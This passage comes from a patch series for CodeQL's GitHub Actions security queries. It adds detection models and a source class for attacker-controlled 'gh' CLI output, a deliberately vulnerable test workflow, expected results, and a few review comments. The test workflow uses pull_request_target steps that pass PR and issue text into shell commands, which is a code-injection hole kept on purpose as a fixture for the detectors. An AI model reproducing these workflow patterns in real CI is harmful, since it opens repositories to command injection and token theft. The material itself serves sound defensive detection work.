.github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | 
.github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | 
.github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
index 1d6122b37479..13e16280c33d 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
@@ -1,3 +1,7 @@
+| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
 | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
index 29237c9a544e..c81666f72dc2 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
@@ -4,10 +4,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 54338f4f35274436b2a76f44c4479ec435da070d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:19:48 +0200 Subject: [PATCH 606/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index c908efa68f7e..867f1bfdb862 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.70 +version: 0.1.71 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d2c2e26c361a..df650d0e242e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.70 +version: 0.1.71 groups: [actions, queries] suites: codeql-suites extractor: javascript From 02c5f74f2059dff88cc6f02655151e0728c28000 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 14:57:59 +0200 Subject: [PATCH 607/707] New gh CLI sources --- ql/lib/codeql/actions/config/Config.qll | 14 ++- .../actions/config/ConfigExtensions.qll | 7 +- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++- .../security/OutputClobberingQuery.qll | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 56 +++++++++ ...commands.yml => untrusted_git_command.yml} | 2 +- .../CWE-094/.github/workflows/test19.yml | 112 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 108 +++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 90 ++++++++++++++ 9 files changed, 412 insertions(+), 9 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_gh_command.yml rename ql/lib/ext/config/{untrusted_git_commands.yml => untrusted_git_command.yml} (96%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7b..4dbdcbf5528d 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -125,6 +125,16 @@ predicate vulnerableActionsDataModel(
 * - cmd_regex: Regular expression for matching untrusted git commands
 * - flag: Flag for the command
 */
-predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) {
- Extensions::untrustedGitCommandsDataModel(cmd_regex, flag)
+predicate untrustedGitCommandDataModel(string cmd_regex, string flag) {
+ Extensions::untrustedGitCommandDataModel(cmd_regex, flag)
+}
+
+/**
+ * MaD models for untrusted gh commands
+ * Fields:
+ * - cmd_regex: Regular expression for matching untrusted gh commands
+ * - flag: Flag for the command
+ */
+predicate untrustedGhCommandDataModel(string cmd_regex, string flag) {
+ Extensions::untrustedGhCommandDataModel(cmd_regex, flag)
 }
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll
index a32e9c445f2d..ed575de0eb47 100644
--- a/ql/lib/codeql/actions/config/ConfigExtensions.qll
+++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll
@@ -61,4 +61,9 @@ extensible predicate vulnerableActionsDataModel(
 /**
 * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch.
 */
-extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag);
+extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag);
+
+/**
+ * Holds for gh commands that may introduce untrusted data
+ */
+extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag);
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 91b110f87eee..56c901434ce0 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
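Review bot: The rename of the public predicate `untrustedGitCommandsDataModel` to `untrustedGitCommandDataModel` ships without a deprecation alias, so any out-of-tree query or model pack still using the old name either fails to compile or, for a data extension that targets the old `extensible` name, silently stops contributing rows — and a dropped model row surfaces as missing sources, not as an error anyone will notice. Keep a one-release shim in Config.qll, `deprecated predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { untrustedGitCommandDataModel(cmd_regex, flag) }`, and call the rename out in the changelog for this release. The new QLDoc should also say how a row is applied: `cmd_regex` is matched from the start of a run-script statement, and `flag` is `"<kind>,<oneline|multiline>"` and is exposed as the source type of the resulting flow source.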
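Review bot: The QLDoc added for `untrustedGhCommandDataModel`, `Holds for gh commands that may introduce untrusted data`, is vaguer than the git one directly above it, which names its precondition (an attacker-controlled branch); the gh source class adds no such precondition, and that difference is worth stating so readers do not assume a checkout is required. Suggested text: `Holds for gh CLI invocations whose output is attacker-controlled regardless of what is checked out (PR/issue title, body, comments, head branch, author, changed file names), because the data is fetched from the GitHub API. cmd_regex is matched from the start of a run-script statement; flag is "<kind>,<oneline|multiline>".`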
@@ -80,7 +80,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource {
 GitCommandSource() {
 exists(Step checkout, string cmd_regex |
- // This shoould be:
+ // This should be:
 // source instanceof PRHeadCheckoutStep
 // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
 // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
@@ -105,8 +105,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource {
 checkout.getAFollowingStep() = run and
 run.getScript().getAStmt() = cmd and
 cmd.indexOf("git") = 0 and
- untrustedGitCommandsDataModel(cmd_regex, flag) and
- cmd.regexpMatch(".*" + cmd_regex + ".*")
+ untrustedGitCommandDataModel(cmd_regex, flag) and
+ cmd.regexpMatch(cmd_regex + ".*")
 )
 }
@@ -117,6 +117,28 @@ class GitCommandSource extends RemoteFlowSource, CommandSource {
 override Run getEnclosingRun() { result = run }
 }
+class GhCLICommandSource extends RemoteFlowSource, CommandSource {
+ Run run;
+ string cmd;
+ string flag;
+
+ GhCLICommandSource() {
+ exists(string cmd_regex |
+ this.asExpr() = run.getScript() and
+ run.getScript().getAStmt() = cmd and
+ cmd.indexOf("gh ") = 0 and
+ untrustedGhCommandDataModel(cmd_regex, flag) and
+ cmd.regexpMatch(cmd_regex + ".*")
+ )
+ }
+
+ override string getSourceType() { result = flag }
+
+ override Run getEnclosingRun() { result = run }
+
+ override string getCommand() { result = cmd }
+}
+
 class GitHubEventPathSource extends RemoteFlowSource, CommandSource {
 string cmd;
 string flag;
@@ -206,7 +228,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource {
 */
 private class CheckoutSource extends RemoteFlowSource, FileSource {
 CheckoutSource() {
- // This shoould be:
+ // This should be:
 // source instanceof PRHeadCheckoutStep
 // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
 // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
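Review bot: In `GhCLICommandSource`, `cmd.indexOf("gh ") = 0` demands a literal single space after `gh`, while every shipped model regex begins with `gh\s+` and `cmd.regexpMatch(cmd_regex + ".*")` already anchors the match at the start of the statement, so the extra check is redundant for the current rows and would reject a tab-separated invocation; either drop it or align it with the regex, `cmd.regexpMatch("gh\\s.*")`. Because both checks anchor at column 0, a statement such as `GH_TOKEN=$T gh pr view ...` or `GH_REPO=... gh issue view ...` is not a source even though its output is just as attacker-controlled; whether `getAStmt()` strips such assignment prefixes is not visible here, so a test case would settle it. The class also has no QLDoc comment; suggest `/** A gh CLI call whose output (PR/issue title, body, comments, head ref, author, changed file names) is attacker-controlled. Unlike GitCommandSource this needs no preceding checkout: the data comes from the GitHub API. */`.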
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
index 58b7b18ca62b..311c3abdb691 100644
--- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
+++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
@@ -20,7 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink {
 (
 step instanceof UntrustedArtifactDownloadStep
 or
- // This shoould be:
+ // This should be:
 // artifact instanceof PRHeadCheckoutStep
 // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error
 // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround
diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml
new file mode 100644
index 000000000000..653f9e31c983
--- /dev/null
+++ b/ql/lib/ext/config/untrusted_gh_command.yml
@@ -0,0 +1,56 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: untrustedGhCommandDataModel
+ data:
+ #
+ # PULL REQUESTS
+ #
+ # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"]
+ # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh pr view $PR_NUMBER --json body --jq .body)
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"]
+ # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"]
+ # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login')
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"]
+ #
+ # ISSUES
+ #
+ # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')
+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body)
+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')
+ - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"]
+ #
+ # API
+ #
+ # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})"
+ #
+ # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1)
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"]
+ # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"]
+ # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"]
+ # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"]
+ #
+ # ISSUES
+ #
+ # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"]
+
diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_command.yml
similarity index 96%
rename from ql/lib/ext/config/untrusted_git_commands.yml
rename to ql/lib/ext/config/untrusted_git_command.yml
index b4b96a4af43e..e862267027a9 100644
--- a/ql/lib/ext/config/untrusted_git_commands.yml
+++ b/ql/lib/ext/config/untrusted_git_command.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: github/actions-all
- extensible: untrustedGitCommandsDataModel
+ extensible: untrustedGitCommandDataModel
 data:
 # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r)
 - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"]
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml
new file mode 100644
index 000000000000..804d55a7db28
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml
@@ -0,0 +1,112 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ pulls1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: head_ref
+ run: |
+ HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')
+ echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.head_ref.outputs.head_ref}}"
+ - id: title
+ run: |
+ TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh pr view $PR_NUMBER --json body --jq .body)
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ - id: files
+ run: |
+ CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"
+ echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.files.outputs.files}}"
+ - id: author
+ run: |
+ AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login')
+ echo "author=$AUTHOR" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.author.outputs.author}}"
+ pulls2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: head_ref
+ run: |
+ HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1)
+ echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.head_ref.outputs.head_ref}}"
+ - id: title
+ run: |
+ TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ - id: files
+ run: |
+ CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')
+ echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.files.outputs.files}}"
+ - id: author
+ run: |
+ AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")
+ echo "author=$AUTHOR" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.author.outputs.author}}"
+ issues1:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+ issues2:
+ runs-on: ubuntu-latest
+ steps:
+ - id: title
+ run: |
+ TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")
+ echo "title=$TITLE" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.title.outputs.title}}"
+ - id: body
+ run: |
+ BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")
+ echo "body=$BODY" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.body.outputs.body}}"
+ - id: comments
+ run: |
+ COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')
+ echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT"
+ - run: echo "${{ steps.comments.outputs.comments}}"
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 83faf4eb5e44..8a134a6f7ef3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} 
"$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| 
.github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| 